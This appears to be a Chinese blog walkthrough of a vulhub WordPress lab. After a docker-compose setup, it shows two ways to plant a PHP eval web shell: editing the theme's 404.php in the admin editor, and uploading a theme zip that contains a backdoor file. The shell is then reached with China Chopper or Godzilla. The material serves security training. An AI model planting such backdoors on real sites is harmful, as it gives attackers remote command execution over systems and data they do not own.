vulhub靶场之WordPress

最新推荐文章于 2024-08-12 16:14:01 发布
最新推荐文章于 2024-08-12 16:14:01 发布
阅读量485 收藏 5
点赞数 4
分类专栏: vulhub 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ineedmoreMuQ/article/details/140885573
版权

第一步搭建环境

靶场地址,自行去gethub找

安装靶场,使用vm虚拟机或云服务器 需安装docker和docker-compose

执行命令

cd /vulhub/wordpress/pwnscriptum

docker-compose up -d

开启docker

docker ps -a查看运行端口

访问进行wordpress设置

第二步 给404.php中写入一句话木马

搭建靶场后台

进行简单的网站后台设置后即可进入如下页面

思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】--》404.php

在404.php中写入一句话木马,删除其原本文件(可选),并更新文件

<?php phpinfo();eval($_POST['cmd']);?>

访问以下路径可以访问到404.php文件

/wp-content/themes/twentyfifteen/404.php
此为wordpress默认路径,若不知道也可百度搜索其所在位置

对木马使用你的武器库吧,这里小编选择了菜刀

是兄弟就来wordpress砍我!

第三步 这次我们换一个姿势,上传文件来上传木马

        接着上一个环境使用...首先网上找一份免费的wordpress的zip主题文件

        下载之后把一个木马文件添加到这个zip压缩包中

        这里小编上传了一个666.php,内容如下

<?php phpinfo();eval($_POST['cmd']);?>

        将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】--》 【主题】--》「【添加】--》「【上传主題】--》「【浏览】--》【现在安装】

        

        压缩文件中的文件名即为主题名

访问
/wp-content/themes/【主题名】/【文件名】
/wp-content/themes/storeflex/666.php

对他使用你的哥斯拉吧

然而小编还是选择了菜刀,完

ineedmoreMuQ
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
简单了解cms,复现vulhub中的wordpress漏洞
weixin_64655821的博客
09-12 1050
简单了解cms,复现vulhub中的wordpress漏洞
vulhub靶场.zip
10-14
vulhub靶场
Vulhub靶场WordPress4.6命令执行(PwnScriptum)漏洞复现
X_python321的博客
07-11 662
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。WordPress会使用PHPMailer组件发送邮件,攻击者在找回密码时通过PHPMailer组件发送重置密码的邮件,利用substr,run等函数构造payload,可造成命令执行漏洞。
wordpress靶机渗透
badminton_0的博客
08-06 688
访问靶机网页,是一个wordpress站点 使用awvs扫描发现弱口令密码 Dirb扫描网站目录phpmyadmin,wp-login.php 登陆admin,发现 flag1 在此网站目录下找到flag2 wpscan扫描用户,写入user.txt cewl生成字典 wpscan爆破 获得密码 使用wordpress 登录 得到flag4 flag3 登陆后台修改404页面写入脚本 蚁剑...
vulhubWordPress pwnscriptum漏洞复现
qq_58873970的博客
09-04 238
phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload。
vulhubWordpress 4.6 任意命令执行漏洞复现
yougexiaojiuguan的博客
03-04 845
漏洞复现的记录
【打靶记录】VulnHub-stapler靶机渗透wp
qq_39972370的博客
02-12 1146
这是一个适合初学者到中级水平的虚拟机。它有一些挑战,但不会过于复杂。至少有两条路径可以获得一个有限权限的shell。至少有三种方法可以获得root权限。
【内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 3526
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
WordPress<= 4.6命令执行漏洞vulhub复现
weixin_45895237的博客
03-18 6341
WordPress <= 4.6(PHPMailer)命令执行漏洞(CVE-2016-10033)
vulhub靶场搭建安装包,包含docker-compose安装包
02-01
使用这条命令西在docker-compose太慢了而且老失败 sudo curl -L ... 使用git clone https://github.com/vulhub/vulhub.git下载vulhub-master下载太慢了 我这边包需要下载的都提供了,助力你搭建vulhub靶场
vulhub靶场文件(不用积分)
05-18
使用Vulhub一键搭建漏洞测试靶场,下载日期2020/05/18。 kali下安装命令 apt-get install docker.io apt-get install docker-compose cd cd /vulhub/flask/ssti service docker start docker-compose up -d
详解 Vulhub 靶场搭建
06-12
手把手教你vulhub搭建命令和过程
vulhub漏洞测试靶场
08-16
Vulhub是一个专门为安全研究人员和渗透测试人员设计的漏洞测试靶场平台,它提供了一系列预配置的漏洞环境,用于学习和实践网络安全技能。这个平台基于Docker容器技术,使得每个漏洞环境可以独立运行,便于管理和复现...
vulhub-jboss-CVE-2017-12149漏洞复现
m0_62008601的博客
09-18 1463
Jboss是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。Jboss属于redhat公司,而且jboss是开源的,免费的,且在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器,所以曾经广为流行。该漏洞出现在请求中,服务器将用户提交的POST内容进行了Java反序列化:(该图像来源于vulhub官方wp中)
vulhub漏洞复现74_Wordpress
weixin_44193247的博客
02-13 1256
vulhub漏洞复现练习篇
墨者靶场 WordPress插件漏洞分析溯源
永远是少年
12-30 1496
今天继续给大家介绍CTF刷题,本文主要内容墨者靶场 WordPress插件漏洞分析溯源。 一、题目简介 二、解题实战
WP-春秋云镜-Brute4Road靶场通关完全指南
qq_45234543的博客
12-30 2768
春秋云镜-Brute4Road靶场通关指南,完全通关指南手把手教学
[渗透测试学习靶机07] vulnhub靶场 Prime 2
weixin_47112073的博客
10-27 1670
Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。
怎么在网络攻击中屹立不倒
最新发布
dexun123的博客
08-12 1213
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
vulhub靶场的综述
12-06
vulhub靶场是一个基于docker的漏洞环境集合,旨在帮助安全研究人员和开发人员更好地学习和研究网络安全知识。它包含了各种常见的漏洞环境,如web漏洞、系统漏洞、密码学漏洞等,用户可以通过下载docker镜像来快速...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值